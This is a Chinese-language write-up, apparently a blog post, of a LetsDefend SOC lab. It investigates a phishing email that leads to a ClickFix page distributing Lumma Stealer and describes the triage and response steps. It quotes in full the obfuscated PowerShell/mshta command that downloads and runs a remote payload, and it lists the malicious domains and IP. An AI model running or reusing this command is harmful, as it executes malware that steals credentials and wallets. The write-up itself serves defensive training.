Lumma Stealer(也称为 LummaC2 Stealer)是一种用 C 语言编写的信息窃取工具,自 2022 年 8 月以来,已经通过一种名为“恶意软件即服务”(MaaS)的模式出现在俄罗斯语论坛上。它被认为是由威胁演员“Shamel”开发的,他的化名为“Lumma”。Lumma Stealer 主要针对加密货币钱包和双重身份验证(2FA)浏览器扩展,然后最终窃取受害者计算机上的敏感信息。一旦获得目标数据,它会通过 HTTP POST 请求将数据泄露到 C2 服务器,用户代理为 "TeslaBrowser/5.5"。该窃取工具还具有一个非驻留加载程序,能够通过 EXE、DLL 和 PowerShell 传递额外的有效负载。
让我们开始调查。
以下是我们收集到的线索。
- **EventID:** 316- **Event Time:** Mar, 13, 2025, 09:44 AM- **SMTP Address:** 132.232.40.201- **Source Address:** update@windows-update.site- **Destination Address:** dylan@letsdefend.io- **E-mail Subject:** Upgrade your system to Windows 11 Pro for FREE- **Device Action:** Allowed- **Trigger Reason:** Redirected site contains a click fix type script for Lumma Stealer distribution.
分析
由于这是一个电子邮件,我们需要检查 “电子邮件安全” 页面,以分析是否存在任何可疑活动。
搜索 SMTP 地址
我们可以检查 更新 按钮重定向的 URL,以确定它是否指向恶意网站。为此,我将提交该 URL 到 VirusTotal 进行检测。
是的,它似乎是恶意的,一些供应商已将其标记为钓鱼网站。
接下来,我们可以检查“端点安全”页面,看看是否与该 URL 有过交互,或者系统是否遭到入侵。
None
在“终端历史”标签页中,我们可以看到已执行了 PowerShell 命令。
CopyC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']') # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3824
该脚本旨在从远程服务器下载并执行文件。该命令使用 mshta.exe(Windows 的合法工具,用于运行 HTML 应用程序)从可疑 URL 获取文件。该 URL 通过插入额外的 ] 字符进行混淆,随后使用 -replace ']' 命令移除这些字符,以还原实际的 URL。一旦清理完成,命令会使用 mshta.exe 运行目标文件(maloy.mp4),该文件很可能包含恶意代码。这种技术通常用于在不被检测的情况下执行载荷。
这证实了攻击者已成功入侵系统并在其中执行了命令。
现在,让我们基于调查结果开始构建应对手册。
应对手册
点击 创建案例 按钮并继续。
我们已收集并调查了与该电子邮件相关的信息,因此可以继续进行分析。
我们观察到该电子邮件包含一个 URL(https://www[.]windows-update[.]site/)。
为了验证该 URL 是否为恶意链接,我们需要使用 VirusTotal 等沙箱平台进行分析。然而,我们已经完成了此步骤,因此可以直接点击“恶意”(Malicious)。
如果你还记得,设备操作被设置为“允许”,这意味着攻击者成功实现了他们的意图并在系统上执行了命令。因此,我们在这里选择“已投递”。
只需点击“删除”。
进入日志管理页面并搜索 IP 地址。你可以看到来自恶意网站的响应,这表明受害者打开了恶意 URL。
转到“端点安全”页面,并隔离受影响的主机,以防止系统进一步被利用。
最后,将该警报关闭为真正阳性(True Positive),因为我们已确认这是一场真实的网络钓鱼攻击。
警报已成功关闭。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
